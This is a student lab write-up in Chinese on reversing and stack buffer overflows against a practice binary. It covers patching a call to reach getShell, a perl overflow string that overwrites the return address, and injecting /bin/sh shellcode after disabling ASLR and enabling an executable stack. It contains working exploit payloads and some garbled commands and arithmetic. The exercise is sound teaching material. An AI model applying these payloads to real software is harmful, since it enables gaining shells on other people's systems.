Exp1 逆向与bof基础
20155332《网络对抗》Exp1 逆向与bof基础
1.实验目的
本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。
2.实验内容
三个实践内容如下:
- 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
- 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
- 注入一个自己制作的shellcode并运行这段shellcode。
这几种思路,基本代表现实情况中的攻击目标:
- 运行原本不可访问的代码片段
- 强行修改程序执行流
- 以及注入运行任意代码。
3.准备工作
3.1安装更新
系统升级实际上是一个软件包的删除与重装过程,在更新的过程中,apt-get会自动删除旧的软件包,以此在系统升级时务必更新软件包的索引文件.
在升级系统升级过程中,原有的系统内核软件会保留在系统中,以便系统升级过程中在使用新的系统内核引导系统出现异常时,使得我们能使用旧的内核继续引导系统。
- 1、更新软件包索引文件
sudo apt-get install update
- 2、更新系统
sudo apt-get update
- 3.安装更新。
sudo apt-get upgrade
3.2.安装32位运行库
- 1.解决资源不可用问题
无法获得锁 /var/lib/dpkg/lock - open (11: 资源暂时不可用)
无法锁定管理目录(/var/lib/dpkg/),是否有其他进程正占用它?
输入命令
sudo rm /var/cache/apt/archives/lock
sudo rm /var/lib/dpkg/lock
- 2.下载lib32ncurses5库
apt-get install lib32ncurses5
- 3.运行程序
./pwn20155332
4实验过程
4.1直接修改程序机器指令,改变程序执行流程
4.1.1 指导思想
我们通过修改main函数中的call指令,使得原本执行foo函数的程序转而去执行getShell函数。
分为两步:
- 第一,通过反汇编,找到getshell函数的位置;
- 第二,修改main函数里面call指令的参数,把foo函数的地址改为getshell函数,从而让程序调用getshell函数
4.1.2 具体实践
1.反汇编可执行 文件pwn20155332,输入指令objdump -d pwn20155332
2.分析代码
我们发现,在main函数中,按照正常流程,call指令会调用foo函数,e8是call指令的机器码,后面跟着四字节的偏移量ff ff ff d7(小端序,补码)。这里的偏移量是怎么求的呢?
call指令在执行时,会EIP当前的值,也就是下一条指令的地址——0x080484ba压栈,然后修改寄存器EIP,EIP+偏移量= 0x080484b + 0xffffffd7 = 0x08048491(32位的有符号数运算),将EIP指向foo函数的起始地址。
我们需要修改call指令的偏移量,根据“目的地址=EIP(call的下一条指令的地址)+偏移量”,新的偏移量 = 0x0804847d(getShell函数的起始地址) - 0x080484ba = 0xffffffc3(补码运算)
3.修改程序
接着用十六进制编辑器,或者vim来修改目标程序即可。这里使用vim,输入:%!xxd进入十六进制模式,修改偏移量,把e8d7改为e8c3即可。
4.验证结果
objdump -d pwn20155332
080484af <main>:
80484af: 55 push %ebp
80484b0: 89 e5 mov %esp,%ebp
80484b2: 83 e4 f0 and $0xfffffff0,%esp
80484b5: e8 c3 ff ff ff call 804847d <getShell>
80484ba: b8 00 00 00 00 mov $0x0,%eax
80484bf: c9 leave
80484c0: c3 ret
80484c1: 66 90 xchg %ax,%ax
80484c3: 66 90 xchg %ax,%ax
80484c5: 66 90 xchg %ax,%ax
80484c7: 66 90 xchg %ax,%ax
80484c9: 66 90 xchg %ax,%ax
80484cb: 66 90 xchg %ax,%ax
80484cd: 66 90 xchg %ax,%ax
80484cf: 90 nop
我们发现5行80484b5: e8 c3 ff ff ff call 804847d <getShell>和原来调用的函数
4.2通过构造输入参数,造成BOF攻击,改变程序执行流程
4.1.1 指导思想
1.输入足够长的一个字符串,用来确定新地址在字符串中的位置
2.计算新地址的值,并用这个值覆盖旧地址。
4.1.2 具体实现
- 1.运行程序
./pwn20155332
- 2.用gdb工具调试
- 3.构造输入字符串
perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
- 4.然后将input的输入,通过管道符“|”,作为pwn20155332的输入。
(cat input; cat) | ./pwn1
- 5.可以发现此时已经获取shell权限。
5.注入Shellcode并执行
- 1.修改设置
execstack -s pwn1 //设置堆栈可执行
execstack -q pwn1 //查询文件的堆栈是否可执行
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
more /proc/sys/kernel/randomize_va_space //确认已经关闭
- 2.构造要注入的payload。
(printf "%032x"; printf "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00") > input_shellcode,把这段字符串先存到文本文件input_shellcode中。
- 3.进入gdb调试,确定覆盖RET地址的值
- 4.在foo函数的RET设置断点
- 5.运行程序,在断点处暂停,查看栈的情况
(cat input_shellcode;cat) | ./pwn1
打开二号终端
- 4.找到pwn20155332的进程号
ps -ef | grep 20155332 //找到pwn20155332的进程号是:2600
- 5.进入gdb调试
attach 2600
disassemble foo
break *0x080484ae
- 6 修改地址
NOP垫的开始地址是0xffffd2fc,修改\x4\x3\x2\x1为\x00\xd3\xff\xff - 7攻击
输入(cat RNS; cat) | ./20155332,在按下回车键:
进入了shell终端,实验成功。
